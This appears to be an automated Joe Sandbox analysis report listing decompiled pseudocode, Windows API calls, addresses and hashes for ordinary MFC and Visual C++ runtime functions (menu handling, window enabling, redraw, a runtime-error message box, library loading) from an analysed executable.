			E0042185A(intOrPtr __ecx, intOrPtr _a4, intOrPtr _a8, int _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				int _v16;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				int _v44;
				char _v48;
				void* __ebp;
				int _t53;
				int _t58;
				int _t61;
				signed int _t65;
				int _t66;
				void* _t67;
				int _t69;
				intOrPtr _t73;
				int _t74;
				int _t75;
				intOrPtr* _t77;
				struct HMENU__* _t83;
				intOrPtr _t84;

				_t73 = __ecx;
				_v8 = __ecx;
				_t53 = E0041A8B4( *((intOrPtr*)(__ecx + 0x1c)));
				if(_a12 == 0) {
					_t77 =  *((intOrPtr*)(__ecx + 0x68));
					_t84 = _a4;
					if(_t77 == 0) {
						L3:
						E00412F9D( &_v48);
						_v36 = _t84;
						if( *((intOrPtr*)(E004249C4() + 0x54)) !=  *(_t84 + 4)) {
							if(GetMenu( *(_t73 + 0x1c)) != 0) {
								_t67 = E00414CEF(_t73);
								if(_t67 != 0) {
									_t83 = GetMenu( *(_t67 + 0x1c));
									if(_t83 != 0) {
										_t69 = GetMenuItemCount(_t83);
										_t75 = 0;
										_a12 = _t69;
										if(_t69 > 0) {
											while(GetSubMenu(_t83, _t75) !=  *(_t84 + 4)) {
												_t75 = _t75 + 1;
												if(_t75 < _a12) {
													continue;
												} else {
												}
												goto L13;
											}
											_push(_t83);
											_v12 = E00417635();
										}
										L13:
										_t73 = _v8;
									}
								}
							}
						} else {
							_v12 = _t84;
						}
						_t53 = GetMenuItemCount( *(_t84 + 4));
						_v40 = _v40 & 0x00000000;
						_v16 = _t53;
						if(_t53 > 0) {
							do {
								_t58 = GetMenuItemID( *(_t84 + 4), _v40);
								_v44 = _t58;
								if(_t58 != 0) {
									if(_t58 != 0xffffffff) {
										_v32 = _v32 & 0x00000000;
										if( *((intOrPtr*)(_t73 + 0x3c)) != 0 && _t58 < 0xf000) {
											_push(1);
											_pop(0);
										}
										_push(0);
										goto L27;
									} else {
										_push(GetSubMenu( *(_t84 + 4), _v40));
										_t65 = E00417635();
										_v32 = _t65;
										if(_t65 != 0) {
											_t66 = GetMenuItemID( *(_t65 + 4), 0);
											_v44 = _t66;
											if(_t66 != 0 && _t66 != 0xffffffff) {
												_push(0);
												L27:
												_push(_t73);
												E00413162( &_v48);
												_t61 = GetMenuItemCount( *(_t84 + 4));
												_t74 = _t61;
												if(_t74 < _v16) {
													_v40 = _v40 + _t61 - _v16;
													while(_v40 < _t74 && GetMenuItemID( *(_t84 + 4), _v40) == _v44) {
														_v40 = _v40 + 1;
													}
												}
												_v16 = _t74;
												_t73 = _v8;
											}
										}
									}
								}
								_v40 = _v40 + 1;
								_t53 = _v40;
							} while (_t53 < _v16);
						}
					} else {
						_t53 =  *((intOrPtr*)( *_t77 + 0x74))(_t84, _a8, 0);
						if(_t53 == 0) {
							goto L3;
						}
					}
				}
				return _t53;
			}

0x00421862
0x00421865
0x0042186b
0x00421874
0x0042187a
0x0042187d
0x00421882
0x00421897
0x0042189a
0x0042189f
0x004218ad
0x004218c1
0x004218c5
0x004218cc
0x004218d3
0x004218d7
0x004218da
0x004218e0
0x004218e2
0x004218e7
0x004218e9
0x004218f6
0x004218fa
0x00000000
0x00000000
0x004218fc
0x00000000
0x004218fa
0x004218fe
0x00421904
0x00421904
0x00421907
0x00421907
0x00421907
0x004218d7
0x004218cc
0x004218af
0x004218af
0x004218af
0x0042190d
0x00421913
0x00421917
0x0042191c
0x00421928
0x0042192e
0x00421932
0x00421935
0x0042193e
0x00421970
0x00421978
0x00421981
0x00421983
0x00421983
0x00421988
0x00000000
0x00421940
0x0042194c
0x0042194d
0x00421954
0x00421957
0x0042195e
0x00421962
0x00421965
0x0042196c
0x00421989
0x00421989
0x0042198d
0x00421995
0x0042199b
0x004219a0
0x004219a5
0x004219a8
0x004219ba
0x004219ba
0x004219a8
0x004219bf
0x004219c2
0x004219c2
0x00421965
0x00421957
0x0042193e
0x004219c5
0x004219c8
0x004219cb
0x00421928
0x00421884
0x0042188c
0x00421891
0x00000000
0x00000000
0x00421891
0x00421882
0x004219d8

APIs

Part of subcall function 0041A8B4: GetFocus.USER32(?,?,?,00421870,?), ref: 0041A8B7
Part of subcall function 0041A8B4: GetParent.USER32(00000000), ref: 0041A8DE
Part of subcall function 0041A8B4: GetWindowLongA.USER32 ref: 0041A8F9
Part of subcall function 0041A8B4: GetParent.USER32(?), ref: 0041A907
Part of subcall function 0041A8B4: GetDesktopWindow.USER32 ref: 0041A90B
Part of subcall function 0041A8B4: SendMessageA.USER32 ref: 0041A91F

GetMenu.USER32(?), ref: 004218BD
GetMenu.USER32(?), ref: 004218D1
GetMenuItemCount.USER32 ref: 004218DA
GetSubMenu.USER32 ref: 004218EB
GetMenuItemCount.USER32 ref: 0042190D
GetMenuItemID.USER32(?,00000000), ref: 0042192E
GetSubMenu.USER32 ref: 00421946
GetMenuItemID.USER32(?,00000000), ref: 0042195E
GetMenuItemCount.USER32 ref: 00421995
GetMenuItemID.USER32(?,00000000), ref: 004219B3

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Menu$Item$Count$ParentWindow$DesktopFocusLongMessageSend
String ID:
API String ID: 4186786570-0
Opcode ID: 6dca45552e476573e8ddd484fced48f908dc2b4a0e5e43a68bf7886d0696cfe4
Instruction ID: c2df077858419d5e37a5876f97d7879e649ce0b97625e1102e6641939069eb9a
Opcode Fuzzy Hash: 6dca45552e476573e8ddd484fced48f908dc2b4a0e5e43a68bf7886d0696cfe4
Instruction Fuzzy Hash: C35190B0B002189FCF11EF65D990BAEB7B5EF18314FA0446AE411E6261D739DD82DF68

Uniqueness

Uniqueness Score: -1.00%

Function 00420900, Relevance: 15.1, APIs: 10, Instructions: 102
windowCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E00420900() {
				void* __ecx;
				void* __ebp;
				struct HWND__* _t21;
				int _t33;
				void* _t40;
				void* _t41;
				struct HWND__* _t46;
				struct HWND__* _t47;
				signed int _t48;
				signed int _t49;
				void* _t50;

				_t40 = _t41;
				 *(_t40 + 0xa0) =  *(_t40 + 0xa0) + 1;
				_t21 = _t40 + 0xa0;
				if( *(_t40 + 0xa0) > 1) {
					L18:
					return _t21;
				}
				 *((intOrPtr*)(_t50 + 0x14)) = E00414CEF(_t41);
				_t48 = 0;
				_t21 = GetWindow(GetDesktopWindow(), 5);
				_t46 = _t21;
				if(_t46 == 0) {
					goto L18;
				} else {
					goto L2;
				}
				do {
					L2:
					if(IsWindowEnabled(_t46) != 0) {
						_push(_t46);
						if(E00413767() != 0 && E004208E0( *((intOrPtr*)( *((intOrPtr*)(_t50 + 0x10)) + 0x1c)), _t46) != 0 && SendMessageA(_t46, 0x36c, 0, 0) == 0) {
							_t48 = _t48 + 1;
						}
					}
					_t21 = GetWindow(_t46, 2);
					_t46 = _t21;
				} while (_t46 != 0);
				if(_t48 != 0) {
					 *(_t40 + 0xa4) = E004131DD(4 + _t48 * 4);
					_push(5);
					_t49 = 0;
					_push(GetDesktopWindow());
					while(1) {
						_t47 = GetWindow();
						if(_t47 == 0) {
							break;
						}
						if(IsWindowEnabled(_t47) != 0) {
							_push(_t47);
							if(E00413767() != 0 && E004208E0( *((intOrPtr*)( *((intOrPtr*)(_t50 + 0x10)) + 0x1c)), _t47) != 0) {
								_t33 = SendMessageA(_t47, 0x36c, 0, 0);
								if(_t33 == 0) {
									EnableWindow(_t47, _t33);
									( *(_t40 + 0xa4))[_t49] = _t47;
									_t49 = _t49 + 1;
								}
							}
						}
						_push(2);
						_push(_t47);
					}
					_t21 =  *(_t40 + 0xa4);
					_t21[_t49] = _t21[_t49] & 0x00000000;
				}
			}

0x00420902
0x00420906
0x00420913
0x0042091a
0x00420a16
0x00420a1b
0x00420a1b
0x00420927
0x0042092b
0x0042093a
0x0042093c
0x00420940
0x00000000
0x00000000
0x00000000
0x00000000
0x00420946
0x00420946
0x0042094f
0x00420951
0x00420959
0x00420980
0x00420980
0x00420959
0x00420984
0x00420986
0x00420988
0x0042098e
0x004209a2
0x004209a8
0x004209aa
0x004209b2
0x004209b3
0x004209b5
0x004209b9
0x00000000
0x00000000
0x004209c4
0x004209c6
0x004209ce
0x004209eb
0x004209f3
0x004209f7
0x00420a03
0x00420a06
0x00420a06
0x004209f3
0x004209ce
0x00420a07
0x00420a09
0x00420a09
0x00420a0c
0x00420a12
0x00420a12

APIs

GetDesktopWindow.USER32 ref: 0042092D
GetWindow.USER32(00000000), ref: 0042093A
IsWindowEnabled.USER32(00000000), ref: 00420947
SendMessageA.USER32 ref: 00420976
GetWindow.USER32(00000000,00000002), ref: 00420984
GetDesktopWindow.USER32 ref: 004209AC
GetWindow.USER32(00000000), ref: 004209B3
IsWindowEnabled.USER32(00000000), ref: 004209BC
SendMessageA.USER32 ref: 004209EB
EnableWindow.USER32(00000000,00000000), ref: 004209F7

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Window$DesktopEnabledMessageSend$Enable
String ID:
API String ID: 2339141687-0
Opcode ID: b425f5d9508085c9cae4404486b252f16e1b35d7c8077e0574aa4d7a51abd98b
Instruction ID: 9d4a9da4e21fb217c8a7ce5c71c2f292f8e7f618580f1a2ae5b0fad087dd6ca4
Opcode Fuzzy Hash: b425f5d9508085c9cae4404486b252f16e1b35d7c8077e0574aa4d7a51abd98b
Instruction Fuzzy Hash: 6B31B1717013286FE731AF25AC05B6B779CEF01795F850026FE41DA293DB68C8418AED

Uniqueness

Uniqueness Score: -1.00%

Function 0041EC61, Relevance: 15.1, APIs: 10, Instructions: 96
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041EC61(void* __ecx, int _a4) {
				int _v8;
				struct tagRECT _v24;
				int _t39;
				int _t42;
				int _t61;
				int _t64;
				void* _t66;
				long _t67;
				int _t69;

				_t67 = _a4;
				_t66 = __ecx;
				_t39 = DefWindowProcA( *(__ecx + 0x1c), 0x46, 0, _t67);
				if(( *(_t67 + 0x18) & 0x00000001) == 0) {
					GetWindowRect( *(_t66 + 0x1c),  &_v24);
					_t42 = _a4;
					_t69 = _v24.right - _v24.left;
					_t64 =  *(_t42 + 0x10);
					_t61 = _v24.bottom - _v24.top;
					_t39 =  *(_t42 + 0x14);
					_v8 = _t64;
					_a4 = _t39;
					if(_t64 != _t69 && ( *(_t66 + 0x65) & 0x00000004) != 0) {
						SetRect( &_v24, _t64 -  *0x439bf0, 0, _t64, _t39);
						InvalidateRect( *(_t66 + 0x1c),  &_v24, 1);
						SetRect( &_v24, _t69 -  *0x439bf0, 0, _t69, _a4);
						InvalidateRect( *(_t66 + 0x1c),  &_v24, 1);
						_t64 = _v8;
						_t39 = _a4;
					}
					if(_t39 != _t61 && ( *(_t66 + 0x65) & 0x00000008) != 0) {
						SetRect( &_v24, 0, _t39 -  *0x439bf4, _t64, _t39);
						InvalidateRect( *(_t66 + 0x1c),  &_v24, 1);
						SetRect( &_v24, 0, _t61 -  *0x439bf4, _v8, _t61);
						return InvalidateRect( *(_t66 + 0x1c),  &_v24, 1);
					}
				}
				return _t39;
			}

0x0041ec69
0x0041ec6e
0x0041ec77
0x0041ec81
0x0041ec8e
0x0041ec97
0x0041ec9a
0x0041eca0
0x0041eca3
0x0041eca6
0x0041ecab
0x0041ecae
0x0041ecb1
0x0041ecc8
0x0041ecd7
0x0041ecee
0x0041ecfd
0x0041ed03
0x0041ed06
0x0041ed06
0x0041ed0b
0x0041ed28
0x0041ed33
0x0041ed4a
0x00000000
0x0041ed55
0x0041ed0b
0x0041ed5f

APIs

DefWindowProcA.USER32(?,00000046,00000000,?), ref: 0041EC77
GetWindowRect.USER32 ref: 0041EC8E
SetRect.USER32 ref: 0041ECC8
InvalidateRect.USER32(?,?,00000001), ref: 0041ECD7
SetRect.USER32 ref: 0041ECEE
InvalidateRect.USER32(?,?,00000001), ref: 0041ECFD
SetRect.USER32 ref: 0041ED28
InvalidateRect.USER32(?,?,00000001), ref: 0041ED33
SetRect.USER32 ref: 0041ED4A
InvalidateRect.USER32(?,?,00000001), ref: 0041ED55

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Rect$Invalidate$Window$Proc
String ID:
API String ID: 570070710-0
Opcode ID: 8724871abec8598df3563b0eda9aa5d8796d70e5df21c29b53d9ac8203d78ebf
Instruction ID: 516b3e1e2029e257780fbb0876dd7829c2ddb4b881f79dfa1f5106cbf91c212e
Opcode Fuzzy Hash: 8724871abec8598df3563b0eda9aa5d8796d70e5df21c29b53d9ac8203d78ebf
Instruction Fuzzy Hash: EC31CB7590020ABFDB10DF94ED88FAA7B7DFB04344F544125FA01A61A0D774AE95CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00409911, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 100
fileCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 96%

			E00409911(void* __edi, long _a4) {
				char _v164;
				char _v424;
				int _t17;
				long _t19;
				signed int _t42;
				long _t47;
				void* _t48;
				signed int _t54;
				void** _t56;
				void* _t57;

				_t48 = __edi;
				_t47 = _a4;
				_t42 = 0;
				_t17 = 0x437068;
				while(_t47 !=  *_t17) {
					_t17 = _t17 + 8;
					_t42 = _t42 + 1;
					if(_t17 < 0x4370f8) {
						continue;
					}
					break;
				}
				_t54 = _t42 << 3;
				_t2 = _t54 + 0x437068; // 0x3c000000
				if(_t47 ==  *_t2) {
					_t17 =  *0x439cf0; // 0x0
					if(_t17 == 1 || _t17 == 0 &&  *0x436ba4 == 1) {
						_t16 = _t54 + 0x43706c; // 0x42f53c
						_t56 = _t16;
						_t19 = E00405A40( *_t56);
						_t17 = WriteFile(GetStdHandle(0xfffffff4),  *_t56, _t19,  &_a4, 0);
					} else {
						if(_t47 != 0xfc) {
							if(GetModuleFileNameA(0,  &_v424, 0x104) == 0) {
								E00409B00( &_v424, "<program name unknown>");
							}
							_push(_t48);
							_t49 =  &_v424;
							if(E00405A40( &_v424) + 1 > 0x3c) {
								_t49 = E00405A40( &_v424) +  &_v424 - 0x3b;
								E0040AD30(E00405A40( &_v424) +  &_v424 - 0x3b, "...", 3);
								_t57 = _t57 + 0x10;
							}
							E00409B00( &_v164, "Runtime Error!\n\nProgram: ");
							E00409B10( &_v164, _t49);
							E00409B10( &_v164, "\n\n");
							_t12 = _t54 + 0x43706c; // 0x42f53c
							E00409B10( &_v164,  *_t12);
							_t17 = E0040AC99( &_v164, "Microsoft Visual C++ Runtime Library", 0x12010);
						}
					}
				}
				return _t17;
			}

0x00409911
0x0040991a
0x0040991d
0x0040991f
0x00409924
0x00409928
0x0040992b
0x00409931
0x00000000
0x00000000
0x00000000
0x00409931
0x00409936
0x00409939
0x0040993f
0x00409945
0x0040994d
0x00409a3e
0x00409a3e
0x00409a49
0x00409a5b
0x00409964
0x0040996a
0x00409986
0x00409994
0x0040999a
0x004099a1
0x004099a3
0x004099b3
0x004099ce
0x004099d6
0x004099db
0x004099db
0x004099ea
0x004099f7
0x00409a08
0x00409a0d
0x00409a1a
0x00409a30
0x00409a38
0x0040996a
0x0040994d
0x00409a63

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,?), ref: 0040997E
GetStdHandle.KERNEL32(000000F4,0042F53C,00000000,?,00000000,?), ref: 00409A54
WriteFile.KERNEL32(00000000), ref: 00409A5B

Strings

Microsoft Visual C++ Runtime Library, xrefs: 00409A2A
<program name unknown>, xrefs: 0040998E
..., xrefs: 004099D0
Runtime Error!Program: , xrefs: 004099E4
hpC, xrefs: 0040991F

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: File$HandleModuleNameWrite
String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program: $hpC
API String ID: 3784150691-1464146632
Opcode ID: 33035c65495730e30a5fb77a12ee862b660262d042e41123e8c96b74bcb04291
Instruction ID: b539e999a38423ee123e62db49a79e9b5e142f56b6bf41d1579e584f354440c8
Opcode Fuzzy Hash: 33035c65495730e30a5fb77a12ee862b660262d042e41123e8c96b74bcb04291
Instruction Fuzzy Hash: AF31C372700218AEDF20EA61DC86FAA377CEB45304F90047BF545F61C2E678AE84CE59

Uniqueness

Uniqueness Score: -1.00%

Function 0041538C, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 68
windowCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E0041538C(void* __ebx, void* __ecx, signed int _a4, long _a8) {
				struct HWND__* _v8;
				void* __ebp;
				void* _t14;
				void* _t17;
				void* _t18;
				void* _t28;
				struct HWND__* _t29;
				signed int _t33;
				void* _t36;
				void* _t40;
				void* _t43;

				_t28 = __ebx;
				_push(__ecx);
				_t36 = __ecx;
				_t40 = E00414CEF(__ecx);
				_t33 = _a4 & 0x0000fff0;
				_t14 = _t33 - 0xf040;
				if(_t14 == 0) {
					L12:
					if(_a8 != 0x75 || _t40 == 0) {
						L15:
						goto L16;
					} else {
						E004166F5(_t40);
						L11:
						_push(1);
						_pop(0);
						L16:
						return 0;
					}
				}
				_t17 = _t14 - 0x10;
				if(_t17 == 0) {
					goto L12;
				}
				_t18 = _t17 - 0x10;
				if(_t18 == 0 || _t18 == 0xa0) {
					if(_t33 == 0xf060 || _a8 != 0) {
						if(_t40 != 0) {
							_push(_t28);
							_t29 =  *(_t36 + 0x1c);
							_v8 = GetFocus();
							E00413740(_t43, SetActiveWindow( *(_t40 + 0x1c)));
							SendMessageA( *(_t40 + 0x1c), 0x112, _a4, _a8);
							if(IsWindow(_t29) != 0) {
								SetActiveWindow(_t29);
							}
							if(IsWindow(_v8) != 0) {
								SetFocus(_v8);
							}
						}
					}
					goto L11;
				} else {
					goto L15;
				}
			}

0x0041538c
0x0041538f
0x00415392
0x0041539c
0x0041539e
0x004153a6
0x004153ab
0x00415432
0x00415437
0x00415446
0x00000000
0x0041543d
0x0041543f
0x0041542d
0x0041542d
0x0041542f
0x00415448
0x0041544b
0x0041544b
0x00415437
0x004153b1
0x004153b4
0x00000000
0x00000000
0x004153b6
0x004153b9
0x004153cc
0x004153d6
0x004153d8
0x004153d9
0x004153eb
0x004153f1
0x00415404
0x00415415
0x00415418
0x00415418
0x00415422
0x00415427
0x00415427
0x00415422
0x004153d6
0x00000000
0x00000000
0x00000000
0x00000000

APIs

GetFocus.USER32 ref: 004153DC
SetActiveWindow.USER32(?), ref: 004153EE
SendMessageA.USER32 ref: 00415404
IsWindow.USER32(?), ref: 00415411
SetActiveWindow.USER32(?), ref: 00415418
IsWindow.USER32(?), ref: 0041541D
SetFocus.USER32(?), ref: 00415427

Strings

u, xrefs: 00415432

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Window$ActiveFocus$MessageSend
String ID: u
API String ID: 1556911595-4067256894
Opcode ID: 8c48182a88e980f122088be52c97c01ef4bfbd378e51f1298f5237cc586278ca
Instruction ID: 08e7680b70c01f71feb78b7b04bbbad669989e92906b740bb6337346909a31ec
Opcode Fuzzy Hash: 8c48182a88e980f122088be52c97c01ef4bfbd378e51f1298f5237cc586278ca
Instruction Fuzzy Hash: D2110372600619EBDB346F25ED48AEA7B64EB80315F448037E901962A1D77CDDC2DA98

Uniqueness

Uniqueness Score: -1.00%

Function 004170E7, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004170E7(intOrPtr __ecx, short _a4) {
				intOrPtr _v8;
				char _v40;
				void _v68;
				void* _t11;
				signed int _t15;
				int _t20;
				char* _t24;
				struct HDC__* _t26;

				_v8 = __ecx;
				_t20 = 0xa;
				_t24 = "System";
				_t11 = GetStockObject(0x11);
				if(_t11 != 0) {
					L2:
					if(GetObjectA(_t11, 0x3c,  &_v68) != 0) {
						_t24 =  &_v40;
						_t26 = GetDC(0);
						_t15 = _v68;
						if(_t15 < 0) {
							_v68 =  ~_t15;
						}
						_t20 = MulDiv(_v68, 0x48, GetDeviceCaps(_t26, 0x5a));
						ReleaseDC(0, _t26);
					}
					L6:
					if(_a4 == 0) {
						_a4 = _t20;
					}
					return E00416FCD(_v8, _t24, _a4);
				}
				_t11 = GetStockObject(0xd);
				if(_t11 == 0) {
					goto L6;
				}
				goto L2;
			}

0x004170f8
0x004170fb
0x004170fc
0x00417103
0x00417107
0x00417111
0x00417120
0x00417124
0x0041712d
0x0041712f
0x00417134
0x00417138
0x00417138
0x00417153
0x00417155
0x00417155
0x0041715b
0x00417160
0x00417162
0x00417162
0x00417175
0x00417175
0x0041710b
0x0041710f
0x00000000
0x00000000
0x00000000

APIs

GetStockObject.GDI32(00000011), ref: 00417103
GetStockObject.GDI32(0000000D), ref: 0041710B
GetObjectA.GDI32(00000000,0000003C,?), ref: 00417118
GetDC.USER32(00000000), ref: 00417127
GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041713E
MulDiv.KERNEL32(?,00000048,00000000), ref: 0041714A
ReleaseDC.USER32 ref: 00417155

Strings

System, xrefs: 004170FC, 0041716B

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Object$Stock$CapsDeviceRelease
String ID: System
API String ID: 46613423-3470857405
Opcode ID: 88a62be2883dc778bffe4279af9f13e5efe5524b205705b3f86c503938333c71
Instruction ID: aedc63dc14c356acfddf8dbf112d5b7e9114f9d10090a13ed9499bd610fb2d75
Opcode Fuzzy Hash: 88a62be2883dc778bffe4279af9f13e5efe5524b205705b3f86c503938333c71
Instruction Fuzzy Hash: 2F113371B00318BBEB209BA19C45FAF7B78FB05790F404026FA05E62C0D7749D42CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040AC99, Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 50
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 46%

			E0040AC99(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr* _t4;
				intOrPtr* _t7;
				_Unknown_base(*)()* _t11;
				void* _t14;
				struct HINSTANCE__* _t15;
				void* _t17;

				_t14 = 0;
				_t17 =  *0x439fd0 - _t14; // 0x0
				if(_t17 != 0) {
					L4:
					_t4 =  *0x439fd4; // 0x0
					if(_t4 != 0) {
						_t14 =  *_t4();
						if(_t14 != 0) {
							_t7 =  *0x439fd8; // 0x0
							if(_t7 != 0) {
								_t14 =  *_t7(_t14);
							}
						}
					}
					return  *0x439fd0(_t14, _a4, _a8, _a12);
				}
				_t15 = LoadLibraryA("user32.dll");
				if(_t15 == 0) {
					L10:
					return 0;
				}
				_t11 = GetProcAddress(_t15, "MessageBoxA");
				 *0x439fd0 = _t11;
				if(_t11 == 0) {
					goto L10;
				} else {
					 *0x439fd4 = GetProcAddress(_t15, "GetActiveWindow");
					 *0x439fd8 = GetProcAddress(_t15, "GetLastActivePopup");
					goto L4;
				}
			}

0x0040ac9a
0x0040ac9c
0x0040aca4
0x0040ace8
0x0040ace8
0x0040acef
0x0040acf3
0x0040acf7
0x0040acf9
0x0040ad00
0x0040ad05
0x0040ad05
0x0040ad00
0x0040acf7
0x00000000
0x0040ad14
0x0040acb1
0x0040acb5
0x0040ad1e
0x00000000
0x0040ad1e
0x0040acc3
0x0040acc7
0x0040accc
0x00000000
0x0040acce
0x0040acdc
0x0040ace3
0x00000000
0x0040ace3

APIs

LoadLibraryA.KERNEL32(user32.dll,?,00000000,?,00409A35,?,Microsoft Visual C++ Runtime Library,00012010,?,0042F53C,?,0042F58C,?,?,?,Runtime Error!Program: ), ref: 0040ACAB
GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 0040ACC3
GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 0040ACD4
GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 0040ACE1

Strings

MessageBoxA, xrefs: 0040ACBD
GetLastActivePopup, xrefs: 0040ACD6
GetActiveWindow, xrefs: 0040ACCE
user32.dll, xrefs: 0040ACA6

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
API String ID: 2238633743-4044615076
Opcode ID: 1c5d333bfefa196ee41cc629c286ab9d53157f6c4e3a187cce04e0c17d5edf39
Instruction ID: a9e059596031861d50e68843925f1eff39380896684ae965336398d5bbd15c8e
Opcode Fuzzy Hash: 1c5d333bfefa196ee41cc629c286ab9d53157f6c4e3a187cce04e0c17d5edf39
Instruction Fuzzy Hash: 42017131300311AFC7109FB4AC84A2B7BE9EE88791758103BE500E22F5DBB89C15DB6D

Uniqueness

Uniqueness Score: -1.00%

Function 004160E6, Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 42
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 40%

			E004160E6(signed short _a4, signed int _a8) {
				struct HINSTANCE__* _t6;
				_Unknown_base(*)()* _t7;
				struct HINSTANCE__* _t13;
				struct HINSTANCE__* _t14;
				CHAR* _t16;
				signed short _t17;

				_t16 = "COMCTL32.DLL";
				_t14 = GetModuleHandleA(_t16);
				_t6 = LoadLibraryA(_t16);
				_t13 = _t6;
				if(_t13 == 0) {
					return _t6;
				} else {
					_t17 = 0;
					_t7 = GetProcAddress(_t13, "InitCommonControlsEx");
					if(_t7 != 0) {
						_push(_a4);
						if( *_t7() != 0) {
							_t17 = _a4;
							if(_t14 == 0) {
								__imp__#17();
								_t17 = _t17 | 0x00003fc0;
							}
						}
					} else {
						if((_a8 & 0x00003fc0) == _a8) {
							__imp__#17();
							_t17 = 0x3fc0;
						}
					}
					FreeLibrary(_t13);
					return _t17;
				}
			}

0x004160e8
0x004160f6
0x004160f8
0x004160fe
0x00416102
0x0041615a
0x00416104
0x0041610a
0x0041610c
0x00416114
0x00416131
0x00416139
0x0041613b
0x00416141
0x00416143
0x00416149
0x00416149
0x00416141
0x00416116
0x00416125
